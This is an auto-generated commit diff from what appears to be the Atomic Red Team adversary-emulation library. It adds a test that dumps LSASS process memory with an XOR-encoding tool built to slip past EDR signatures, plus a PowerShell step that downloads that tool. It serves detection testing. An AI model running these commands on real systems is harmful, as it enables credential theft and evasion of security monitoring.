Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -450,6 +450,7 @@
   - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
   - Atomic Test #10: Powershell Mimikatz [windows]
   - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -50,6 +50,7 @@
   - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
   - Atomic Test #10: Powershell Mimikatz [windows]
   - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)

atomics/Indexes/index.yaml

@@ -20953,6 +20953,43 @@ credential-access:
           & "#{createdump_exe}" -u -f #{output_file} $ID
         cleanup_command: 'del #{output_file}
 
+'
+        name: powershell
+        elevation_required: true
+    - name: Dump LSASS.exe using imported Microsoft DLLs
+      auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+      description: "The memory of lsass.exe is often dumped for offline credential
+        theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+        exported functions. Xordump will re-read the resulting minidump \nfile and
+        delete it immediately to avoid brittle EDR detections that signature lsass
+        minidump files.\n\nUpon successful execution, you should see the following
+        file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        xordump_exe:
+          description: Path to xordump
+          type: Path
+          default: C:\Windows\Temp\xordump.exe
+        output_file:
+          description: Path where resulting dump should be placed
+          type: Path
+          default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+      dependencies:
+      - description: 'Computer must have xordump.exe
+
+'
+        prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+          -OutFile #{xordump_exe}
+
+'
+      executor:
+        command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+        cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
 '
         name: powershell
         elevation_required: true

atomics/T1003.001/T1003.001.md

@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:
 
 - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
 
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+
 
 <br/>
 
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
 <br/>